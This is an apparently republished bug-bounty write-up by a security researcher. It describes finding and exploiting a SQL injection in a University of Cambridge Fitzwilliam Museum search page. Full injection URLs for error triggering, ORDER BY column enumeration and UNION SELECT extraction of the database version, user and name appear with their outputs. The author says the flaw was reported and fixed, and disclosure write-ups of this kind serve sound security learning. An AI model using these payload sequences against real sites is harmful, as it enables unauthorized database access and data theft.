SQLI in University of Cambridge

medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 17 hours ago · bug-bounty
quality 6/10 · good
0 net
AI Summary

A researcher discovered and exploited a SQL injection vulnerability in the University of Cambridge's Fitzwilliam Museum search functionality, demonstrating column enumeration via ORDER BY, UNION SELECT attacks, and successful extraction of database version, user credentials, and database name.

Tags
sql-injection union-based-sqli web-application database-enumeration bug-bounty vulnerable-search-parameter mysql order-by-enumeration error-based-sqli
Entities
University of Cambridge Adesh Kolte Fitzwilliam Museum MySQL 5.1.39
SQL Injection Vulnerability In University Of Cambridge | by Adesh Kolte - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original SQL Injection Vulnerability In University Of Cambridge Hello Adesh Kolte Follow ~4 min read · August 24, 2018 (Updated: August 24, 2018) · Free: Yes SQL Injection Vulnerability In University Of Cambridge Introduction Of Author: I am Adesh Nandkishor Kolte ,An Independent Security Resercher From India Found a SQL Injection Vulnerability in University Of Cambridge This is the most prevalent and most dangerous of web application vulnerabilities. Having this SQLi vulnerability in the application, an attacker may cause severe damage such as bypassing logins, retrieving sensitive information, modifying, deleting data. Sometimes this costs life when it comes to Healthcare, Banking domains. Okay introduction apart, the objective of this article is to exploit and read some sensitive data from the database. If you don't know what exactly is this SQLi then read my other article which may throw some light. I am splitting the subject into two parts, having everything in one might throw you out of interest. Identifying the vulnerable site! I tried the most basic check for SQL vulnerability by inserting an apostrophe (') in the username field and leaving the password field empty and trying to login, after a few attempts this website gave me an SQL error which looked something like this. Now, lets get started. Launch your Target select SQL injection GET/Search. Our Target URL : https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=named_individuals_sum ' Fixing The Error So I tried Some tricks for fixing this error which occur when i entered the single quote (') Like that https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=named_individuals_sum ' — + https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=named_individuals_sum ' — - https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]='named_individuals_sum ' — +(worked :) Fixed The error ) Finding Columns Using Order By or Group By Order By Clause in My SQL The SQL ORDER BY clause is used to sort the data in ascending or descending order, based on one or more columns. Some databases sort the query results in an ascending order by default. Group By Clause in My SQL The SQL GROUP BY clause is used in collaboration with the SELECT statement to arrange identical data into groups. This GROUP BY clause follows the WHERE clause in a SELECT statement and precedes the ORDER BY clause. For finding the Column here i used order by clause https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]='named_individuals_sum ' order by 16 — + so i tried order by 15 — + here https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]='named_individuals_sum ' order by 1 5— + Site Loaded Normally so this website have 15 columns Finding Vulnerable Column From 15 Columns For finding vulnerable Column i have to use the keyword in MYSQL UNION SELECT What is the use of Union Clause in My SQL? The SQL UNION clause/operator is used to combine the results of two or more SELECT statements without returning any duplicate rows What is SELECT Statement ? The SQL SELECT statement is used to fetch the data from a database table which returns this data in the form of a result table. These result tables are called result-sets. — — — — — — Syntax The basic syntax of the UNION SELECT statement is as follows UNION SELECT column1, column2, columnN FROM table_name; http://webapps.fitzmuseum.cam.ac.uk/wn/search.php?pid=Search&s_arg=Boutin&opt[]='named_individuals_sum' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+ Getting Required Data Finding Version, User and Database name SQL provide function for that For example version(),User() and database() Version() http://webapps.fitzmuseum.cam.ac.uk/wn/search.php?pid=Search&s_arg=Boutin&opt[]=%27named_individuals_sum%27%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--+ Output: 5.1.39-community User() http://webapps.fitzmuseum.cam.ac.uk/wn/search.php?pid=Search&s_arg=Boutin&opt[]=%27named_individuals_sum%27%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12,13,14,15--+ output: [email protected] Database() http://webapps.fitzmuseum.cam.ac.uk/wn/search.php?pid=Search&s_arg=Boutin&opt[]=%27named_individuals_sum%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13,14,15--+ Output: wn_index Video Demonstration: https://youtu.be/tK88xAwuF2w I reported last week and vulnerability Fixed :) I hope you like the Article Thanks for Reading and Happy Hunting :) #programming #infosec #cybersecurity #bug-bounty Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).
← Back to stories